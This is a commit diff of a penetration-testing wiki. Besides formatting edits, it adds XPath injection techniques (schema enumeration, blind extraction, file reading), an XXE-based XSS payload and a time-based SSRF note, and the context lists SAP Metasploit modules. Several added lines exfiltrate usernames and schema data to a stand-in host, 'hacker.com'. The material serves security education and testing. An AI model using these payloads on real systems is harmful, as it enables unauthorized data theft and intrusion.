GitBook: [master] 7 pages and 14 assets modified

forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md

@@ -134,7 +134,7 @@ Some interesting attributes:
 * [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) \(among others\):
   * Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides.
 
-![](../../../.gitbook/assets/image%20%28507%29%20%281%29.png)
+![](../../../.gitbook/assets/image%20%28507%29%20%281%29%20%281%29.png)
 
 ![](../../../.gitbook/assets/image%20%28512%29.png)
 

forensics/basic-forensic-methodology/windows-forensics/README.md

@@ -130,7 +130,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
 
 Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\).
 
-![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%281%29.png)
+![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%282%29%20%281%29.png)
 
 ### USB Detective
 

mobile-apps-pentesting/ios-pentesting/README.md

@@ -601,7 +601,7 @@ Many apps log informative \(and potentially sensitive\) messages to the console
 5. Reproduce the problem.
 6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
 
-![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%281%29.png)
+![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%282%29%20%281%29.png)
 
 You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:
 

pentesting-web/ssrf-server-side-request-forgery.md

@@ -506,6 +506,10 @@ curl http://rancher-metadata/<version>/<path>
 
 The difference between a blind SSRF and a not blind one is that in the blind you cannot see the response of the SSRF request. Then, it is more difficult to exploit because you will be able to exploit only well-known vulnerabilities.
 
+### Time based SSRF
+
+**Checking the time** of the responses from the server it might be **possible to know if a resource exists or not** \(maybe it takes more time accessing an existing resource than accessing one that doesn't exist\)
+
 ## Detect SSRF
 
 You can use [https://github.com/teknogeek/ssrf-sheriff](https://github.com/teknogeek/ssrf-sheriff) to create an HTTP server that will respond correctly to a lot of different requests \(GET, POST, PTU, DELETE, JSON, TXT, GIF, MP3...\).

pentesting-web/xpath-injection.md

@@ -101,7 +101,7 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp
 
 ## Example
 
-```text
+```markup
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <data>
 <user>
@@ -122,6 +122,8 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp
 </data>
 ```
 
+### Access the information
+
 ```text
 All names - [pepe, mark, fino]
 name
@@ -149,6 +151,43 @@ string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe
 substrig(//user[position()=2/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"
 ```
 
+### Identify & stealing the schema
+
+```python
+and count(/*) = 1 #root
+and count(/*[1]/*) = 2 #count(root) = 2 (a,c)
+and count(/*[1]/*[1]/*) = 1 #count(a) = 1 (b)
+and count(/*[1]/*[1]/*[1]/*) = 0 #count(b) = 0
+and count(/*[1]/*[2]/*) = 3 #count(c) = 3 (d,e,f)
+and count(/*[1]/*[2]/*[1]/*) = 0 #count(d) = 0
+and count(/*[1]/*[2]/*[2]/*) = 0 #count(e) = 0
+and count(/*[1]/*[2]/*[3]/*) = 1 #count(f) = 1 (g)
+and count(/*[1]/*[2]/*[3]/[1]*) = 0 #count(g) = 0
+
+#The previous solutions are the representation of a schema like the following
+#(at this stage we don't know the name of the tags, but jus the schema)
+<root>
+    <a>
+        <b></b>
+    </a>
+    <c>
+        <d></d>
+        <e></e>
+        <f>
+            <h></h>
+        </f>
+    </c>
+</root>
+
+and name(/*[1]) = "root" #Confirm the name of the first tag is "root"
+and substring(name(/*[1]/*[1]),1,1) = "a" #First char of name of tag `<a>` is "a"
+and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1)) = 105 #Firts char of tag `<b>`is codepoint 105 ("i") (https://codepoints.net/)
+
+#Stealing the schema via OOB
+doc(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
+doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
+```
+
 ## Authentication Bypass
 
 ### **Example of queries:**
@@ -226,19 +265,20 @@ The output contains strings and the user can manipulate the values to search:
 
 ## Blind Explotation
 
-### **Get length of a value and extract it by comparisons:** 
+### **Get length of a value and extract it by comparisons:**
 
-```text
+```bash
 ' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''=' #True if length equals 4
 ' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''=' #True is first equals "a"
 
-Other way
 substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
+
+... and ( if ( $employee/role = 2 ) then error() else 0 )... #When error() is executed it rises an error and never returns a value
 ```
 
-### **Example:**
+### **Python Example**
 
-```text
+```python
 import requests, string 
 
 flag = ""
@@ -259,6 +299,31 @@ for i in range(1, l + 1): #print("[i] Looking for char number " + str(i))
             break
 ```
 
+### Read file
+
+```python
+(substring((doc('file://protected/secret.xml')/*[1]/*[1]/text()[1]),3,1))) < 127
+```
+
+## OOB Exploitation
+
+```python
+doc(concat("http://hacker.com/oob/", RESULTS))
+doc(concat("http://hacker.com/oob/", /Employees/Employee[1]/username))
+doc(concat("http://hacker.com/oob/", encode-for-uri(/Employees/Employee[1]/username)))
+
+#Instead of doc() you can use the function doc-available
+doc-available(concat("http://hacker.com/oob/", RESULTS))
+#the doc available will respond true or false depending if the doc exists,
+#user not(doc-available(...)) to invert the result if you need to
+```
+
+### Automatic tool
+
+{% embed url="https://xcat.readthedocs.io/" %}
+
+
+
 ## References
 
 [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection)

pentesting-web/xxe-xee-xml-external-entity.md

@@ -314,6 +314,12 @@ Once the server has downloaded your file, you need to find its location by brows
 Writing files in a temporary directory can help to e**scalate another vulnerability that involves a path traversal** \(such as local file include, template injection, XSLT RCE, deserialization, etc\).
 {% endhint %}
 
+### XSS
+
+```markup
+<![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]>
+```
+
 ### DoS
 
 #### Billion Laugh Attack
@@ -343,6 +349,10 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
 i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
 ```
 
+#### Quadratic Blowup Attack
+
+![](../.gitbook/assets/image%20%28479%29.png)
+
 ## Hidden XXE Surfaces
 
 ### XInclude

pentesting/pentesting-sap.md

@@ -1,6 +1,6 @@
 # Pentesting SAP
 
-### Introduction about SAP
+## Introduction about SAP
 
 SAP stands for Systems Applications and Products in Data Processing. SAP, by definition, is also the name of the ERP \(Enterprise Resource Planning\) software as well as the name of the company.  
 SAP system consists of a number of fully integrated modules, which covers virtually every aspect of business management.
@@ -15,7 +15,7 @@ You’d be surprised if you knew how often these **passwords aren’t changed in
 Try to get access to the shell of any server using username <SID>adm.  
 Bruteforcing can help, whoever there can be Account Lockout mechanism.
 
-### Discovery
+## Discovery
 
 > Next section is mostly from [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures) from user shipcod3!
 
@@ -63,7 +63,7 @@ msf auxiliary(sap_service_discovery) > run
 [*] 192.168.96.101:       - [SAP] Beginning service Discovery '192.168.96.101'
 ```
 
-#### Testing the Thick Client / SAP GUI
+### Testing the Thick Client / SAP GUI
 
 Here is the command to connect to SAP GUI  
 `sapgui <sap server hostname> <system number>`
@@ -126,7 +126,7 @@ BWDEVELOPER:Down1oad:001
 * Check if you can execute system commands / run scripts in the client.
 * Check if you can do XSS on BAPI Explorer
 
-### Testing the web interface
+## Testing the web interface
 
 * Crawl the URLs \(see discovery phase\).
 * Fuzz the URLs like in the discovery phase. Here is what [http://SAP:50000/index.html](http://sap:50000/index.html) looks like:
@@ -176,7 +176,7 @@ This XML file does not appear to have any style information associated with it.
 </SOAP-ENV:Envelope>
 ```
 
-### Attack!
+## Attack!
 
 * Check if it runs on old servers or technologies like Windows 2000.
 * Plan the possible exploits / attacks, there are a lot of Metasploit modules for SAP discovery \(auxiliary modules\) and exploits:
@@ -243,7 +243,7 @@ Matching Modules
    exploit/windows/http/sapdb_webtools                                      2007-07-05       great      SAP DB 7.4 WebTools Buffer Overflow
    exploit/windows/lpd/saplpd                                               2008-02-04       good       SAP SAPLPD 6.28 Buffer Overflow
    exploit/windows/misc/sap_2005_license                                    2009-08-01       great      SAP Business One License Manager 2005 Buffer Overflow
-   exploit/windows/misc/sap_netweaver_dispatcher                            2012-05-08       normal     SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow                   
+   exploit/windows/misc/sap_netweaver_dispatcher                            2012-05-08       normal     SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow
 ```
 
 * Try to use some known exploits \(check out Exploit-DB\) or attacks like the old but goodie “SAP ConfigServlet Remote Code Execution” in the SAP Portal:
@@ -278,14 +278,14 @@ bizploit/plugins> back
 bizploit> start
 ```
 
-### Other Useful Tools for Testing
+## Other Useful Tools for Testing
 
 * [PowerSAP](https://github.com/airbus-seclab/powersap) - Powershell tool to assess sap security
 * [Burp Suite](https://portswigger.net/burp) - a must have for directory fuzzing and web security assessments
 * [pysap](https://github.com/SecureAuthCorp/pysap) - Python library to craft SAP network protocol packets
 * [https://github.com/gelim/nmap-erpscan](https://github.com/gelim/nmap-erpscan) - Help nmap to detect SAP/ERP
 
-### References
+## References
 
 * [SAP Penetration Testing Using Metasploit](http://information.rapid7.com/rs/rapid7/images/SAP%20Penetration%20Testing%20Using%20Metasploit%20Final.pdf)
 * [https://github.com/davehardy20/SAP-Stuff](https://github.com/davehardy20/SAP-Stuff) - a script to semi-automate Bizploit